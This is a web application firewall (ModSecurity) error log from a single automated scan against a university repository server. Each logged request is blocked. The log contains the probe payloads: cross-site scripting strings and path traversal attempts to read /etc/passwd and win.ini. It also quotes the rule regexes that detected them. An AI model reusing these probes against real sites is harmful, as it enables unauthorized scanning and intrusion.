"OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/title_az.php"] [unique_id "ZO16Z8Co-f0AAApa-TUAAAAg"]
[Tue Aug 29 11:56:07.684244 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16Z8Co-f0AAApbUvoAAAAh"]
[Tue Aug 29 11:56:08.567670 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/plugins/content/jw_allvideos/includes/download.php"] [unique_id "ZO16aMCo-f0AAAq@sgIAAAAM"]
[Tue Aug 29 11:56:08.637279 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:count: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/goform/activate_process"] [unique_id "ZO16aMCo-f0AAAqY6RkAAAAr"]
[Tue Aug 29 11:56:10.732158 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:backurl: 1 onmouseover=alert(/document.domain/) y="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/plugins/template/login.php"] [unique_id "ZO16asCo-f0AAAqTv3EAAAAa"]
[Tue Aug 29 11:56:11.574662 2023] [:error] [pid 2587] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:returnTo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:returnTo: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/login.html"] [unique_id "ZO16a8Co-f0AAAobT-sAAAAQ"]
[Tue Aug 29 11:56:11.588787 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/wp-symposium/get_album_item.php"] [unique_id "ZO16a8Co-f0AAAocyecAAAAR"]
[Tue Aug 29 11:56:11.734691 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/login/"] [unique_id "ZO16a8Co-f0AAApa-UcAAAAg"]
[Tue Aug 29 11:56:12.540031 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO16bMCo-f0AAAolK0IAAAAe"]
[Tue Aug 29 11:56:12.676271 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:urll. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:urll: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/r2w/signIn.do"] [unique_id "ZO16bMCo-f0AAArB1ygAAAAV"]
[Tue Aug 29 11:56:13.565120 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:UID: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/ie50/system/login/SysLoginUser.aspx"] [unique_id "ZO16bcCo-f0AAApXgtYAAAAU"]
[Tue Aug 29 11:56:15.033010 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16b8Co-f0AAArB1zQAAAAV"]
[Tue Aug 29 11:56:15.171589 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:UID: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/system/login/SysLoginUser.aspx"] [unique_id "ZO16b8Co-f0AAArB1zUAAAAV"]
[Tue Aug 29 11:56:15.626912 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:aoid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:aoid: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php"] [unique_id "ZO16b8Co-f0AAAocyf0AAAAR"]
[Tue Aug 29 11:56:16.778974 2023] [:error] [pid 2742] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:serviceestimatekey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:serviceestimatekey: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/car1/estimateresult/result"] [unique_id "ZO16cMCo-f0AAAq2KgUAAAAE"]
[Tue Aug 29 11:56:17.213284 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/kindeditor/php/demo.php"] [unique_id "ZO16ccCo-f0AAAq3a9AAAAAI"]
[Tue Aug 29 11:56:17.795110 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/php/demo.php"] [unique_id "ZO16ccCo-f0AAAq5@PgAAAAK"]
[Tue Aug 29 11:56:18.676226 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16csCo-f0AAAqeFmoAAAAx"]
[Tue Aug 29 11:56:19.623474 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ver. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ver: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php"] [unique_id "ZO16c8Co-f0AAAqeFnQAAAAx"]
[Tue Aug 29 11:56:21.982755 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:section: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dcCo-f0AAAqSw7UAAAAN"]
[Tue Aug 29 11:56:22.112503 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dsCo-f0AAAqSw7oAAAAN"]
[Tue Aug 29 11:56:23.290978 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16d8Co-f0AAAq5@QQAAAAK"]
[Tue Aug 29 11:56:23.535663 2023] [:error] [pid 2762] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22\\x22  found within ARGS:message: <img src=\\x22\\x22 onerror=\\x22alert(1);\\x22>1</img>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/Pacs/login.php"] [unique_id "ZO16d8Co-f0AAArKv1gAAAAa"]
[Tue Aug 29 11:56:23.644802 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:searchTerm: x' alert(1) 'x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16d8Co-f0AAArLLc0AAAAb"]
[Tue Aug 29 11:56:24.703703 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ),// found within ARGS:searchTerm: x\\x5c' alert(1),//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16eMCo-f0AAArB10QAAAAV"]
[Tue Aug 29 11:56:25.631271 2023] [:error] [pid 2759] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:redirect_to: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16ecCo-f0AAArHa1kAAAAJ"]
[Tue Aug 29 11:56:27.307897 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:referer. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:referer: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/src/login.php"] [unique_id "ZO16e8Co-f0AAAq5@RAAAAAK"]
[Tue Aug 29 11:56:29.545528 2023] [:error] [pid 2764] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class_key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:class_key: ../../../../../../../../../../windows/win.ini\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/manager/controllers/default/resource/tvs.php"] [unique_id "ZO16fcCo-f0AAArMmqkAAAAf"]
[Tue Aug 29 11:56:30.532815 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:page: \\x22/></script><script>alert(document.domain)</script><b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php"] [unique_id "ZO16fsCo-f0AAArLLfAAAAAb"]
